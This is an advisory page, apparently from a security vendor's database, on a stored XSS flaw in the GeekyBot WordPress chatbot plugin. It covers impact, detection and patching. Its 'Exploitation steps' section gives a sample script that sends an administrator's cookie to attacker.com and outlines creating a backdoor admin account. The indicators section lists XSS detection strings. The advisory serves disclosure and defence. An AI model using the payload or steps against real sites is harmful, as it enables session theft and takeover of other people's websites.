CVE-2025-15266
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-15266 is a Stored Cross-Site Scripting (XSS) vulnerability in the GeekyBot — Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress. It affects all versions up to and including 1.1.8, allowing unauthenticated attackers to inject malicious scripts via the chat message field that execute when an administrator views the Chat History page. The CVE was published on January 14, 2026, and the affected version range was later updated from 1.1.7 to 1.1.8 by Wordfence on April 8, 2026. It carries a CVSS v3.1 base score of 7.2 (High), assigned by Wordfence (Wordfence, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), rooted in insufficient input sanitization and output escaping applied to the chat message field (Wordfence). An unauthenticated attacker submits a crafted chat message containing arbitrary JavaScript to the chatbot interface; the plugin stores this input without sanitization. When an administrator later navigates to the Chat History page in the WordPress admin panel, the stored payload is rendered and executed in their browser context. Because no authentication or special privileges are required to submit chat messages, the attack surface is fully exposed to any internet user.

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser session of a WordPress administrator, potentially leading to session token theft, credential harvesting, or unauthorized administrative actions such as creating rogue admin accounts or installing malicious plugins. The changed scope (S:C) in the CVSS vector reflects that the impact crosses from the plugin's context into the broader WordPress admin environment. While confidentiality and integrity impacts are rated low individually, the combination in an admin context can facilitate full site compromise (Wordfence, Red Hat CVE).

Exploitability

No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for CVE-2025-15266. The EPSS score is approximately 0.074%, indicating a low probability of exploitation in the near term (Feedly). The vulnerability does not appear in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, the zero-authentication requirement significantly lowers the barrier for exploitation, as any visitor to a site running the affected plugin can submit a malicious chat message.

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the GeekyBot plugin (versions ≤ 1.1.8) using tools like WPScan, Shodan, or by checking publicly accessible plugin metadata at /wp-content/plugins/geeky-bot/.
  2. Locate the chatbot interface: Navigate to the target WordPress site and find the page where the GeekyBot chatbot widget is embedded and accepting user input.
  3. Craft a malicious payload: Prepare a stored XSS payload, for example: <script>document.location='https://attacker.com/steal?c='+document.cookie;</script> or a payload that creates a new admin user via the WordPress REST API.
  4. Submit the payload: Enter the crafted script into the chat message field and submit it. No authentication is required. The plugin stores the unsanitized input in the database.
  5. Wait for administrator access: The payload executes automatically when a site administrator opens the Chat History page in the WordPress admin panel.
  6. Achieve objective: Depending on the payload, the attacker may steal the admin's session cookie, redirect the admin to a phishing page, or silently perform privileged actions (e.g., adding a backdoor account) (Wordfence).

Indicators of compromise

  • Network: Outbound HTTP requests from the administrator's browser to unexpected external domains shortly after accessing the WordPress admin Chat History page; unusual POST requests to the chatbot endpoint containing HTML/JavaScript tags.
  • Logs: WordPress access logs showing submissions to the chatbot endpoint with payloads containing <script>, javascript:, onerror=, or similar XSS indicators in the message body.
  • File System: Unexpected new WordPress admin accounts or plugin/theme modifications made around the time an administrator reviewed chat history.
  • Database: Entries in the GeekyBot chat history table containing raw HTML or JavaScript tags rather than plain text messages.

Mitigation and workarounds

Users should update the GeekyBot plugin to a version beyond 1.1.8, which addresses the insufficient input sanitization and output escaping issues. The plugin changelog and patched code can be reviewed via the WordPress plugin repository (WordPress Plugin). As an interim workaround, administrators should disable or deactivate the GeekyBot plugin until a patched version is confirmed installed. Additionally, a Web Application Firewall (WAF) with XSS filtering rules — such as Wordfence's own firewall — can help block malicious payloads from being stored (Wordfence).

Community reactions

Wordfence, the CNA that assigned and disclosed this CVE, included it in their weekly WordPress vulnerability report for January 12–18, 2026 (Wordfence Blog). RedPacket Security flagged the vulnerability in their CISA vulnerability summary for the week of January 12, 2026, and shared it on social media (RedPacket Security). No significant broader media coverage or notable researcher commentary beyond routine vulnerability tracking has been observed.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2024-13784CRITICAL9.8
  • arforms-form-builder
NoYesAug 16, 2026
CVE-2026-65640HIGH8.8
  • wordpress
NoYesAug 17, 2026
CVE-2026-11801HIGH7.5
  • wpadverts
NoYesAug 18, 2026
CVE-2026-13700MEDIUM5.9
  • wooms
NoNoAug 17, 2026
CVE-2026-14832MEDIUM5.3
  • shopsmart-loyalty-for-woocommerce
NoNoAug 17, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management